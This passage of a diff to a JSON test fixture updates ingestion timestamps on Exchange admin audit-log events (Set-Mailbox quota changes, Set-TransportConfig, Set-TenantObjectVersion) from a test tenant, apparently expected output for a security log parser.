bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1190,7 +1190,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853028900Z", + "ingested": "2021-12-14T14:49:28.056951527Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:09\",\"ExternalAccess\":true,\"Id\":\"7dafe4a3-487a-46ec-dadc-08d7ac0f2e06\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{E9F19AD5-5B1D-4361-BE94-E55A6E1A6AA3}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1271,7 +1271,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853035200Z", + "ingested": "2021-12-14T14:49:28.056952120Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1339,7 +1339,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853041200Z", + "ingested": "2021-12-14T14:49:28.056952880Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1408,7 +1408,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853046900Z", + "ingested": "2021-12-14T14:49:28.056953460Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:13\",\"ExternalAccess\":true,\"Id\":\"ea769bfc-fa67-465c-767a-08d7adfc0b7b\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1477,7 +1477,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853052600Z", + "ingested": "2021-12-14T14:49:28.056954091Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:08\",\"ExternalAccess\":true,\"Id\":\"e022fa0d-13b2-4314-b707-08d7adfc0868\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"},{\"Name\":\"SupervisionTags\",\"Value\":\"Reject;Allow\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1545,7 +1545,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853058400Z", + "ingested": "2021-12-14T14:49:28.056954583Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:55\",\"ExternalAccess\":true,\"Id\":\"514d0e07-410f-469c-a7f9-08d7ac0f496e\",\"ObjectId\":\"testsiem.onmicrosoft.com\",\"Operation\":\"Set-TenantObjectVersion\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1614,7 +1614,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853064100Z", + "ingested": "2021-12-14T14:49:28.056955134Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:52\",\"ExternalAccess\":true,\"Id\":\"8a3c4f54-f2de-4717-dd56-08d7ac0f23be\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Transport Settings\",\"Operation\":\"Set-TransportConfig\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\"},{\"Name\":\"OrganizationFederatedMailbox\",\"Value\":\"FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@testsiem.onmicrosoft.com\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1695,7 +1695,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853069800Z", + "ingested": "2021-12-14T14:49:28.056955572Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:49\",\"ExternalAccess\":true,\"Id\":\"9eb764a6-fee5-4c3a-6adc-08d7ac0f220f\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"OMEncryptionStore\",\"Value\":\"True\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1776,7 +1776,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853075900Z", + "ingested": "2021-12-14T14:49:28.056956179Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:18\",\"ExternalAccess\":true,\"Id\":\"a4912729-9b49-43b3-d21f-08d7adfc0e8e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"TenantAllowBlockLists\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/TenantAllowBlocLists_F0767F09-6B4C-4F78-9234-2C0481176063\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1857,7 +1857,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853081600Z", + "ingested": "2021-12-14T14:49:28.056956630Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:56\",\"ExternalAccess\":true,\"Id\":\"d83e97f0-951c-4ccc-630e-08d7ac0f267e\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -1938,7 +1938,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853087900Z", + "ingested": "2021-12-14T14:49:28.056957179Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:17\",\"ExternalAccess\":true,\"Id\":\"2cbbd2bb-607e-49b1-c02c-08d7adfc0e1c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2019,7 +2019,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853093900Z", + "ingested": "2021-12-14T14:49:28.056957719Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:57\",\"ExternalAccess\":true,\"Id\":\"165a283d-6f9b-4dc2-1b86-08d7ac0f273c\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2100,7 +2100,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853099700Z", + "ingested": "2021-12-14T14:49:28.056958391Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:16\",\"ExternalAccess\":true,\"Id\":\"979931d3-c99d-45b1-14e1-08d7ac0f3209\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{61D4A3E5-D6B5-401C-B13A-CCAD2BA8E8E9}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -2181,7 +2181,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853105500Z", + "ingested": "2021-12-14T14:49:28.056959057Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:20\",\"ExternalAccess\":true,\"Id\":\"4bddac31-664e-4432-d181-08d7ac0f34d2\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB 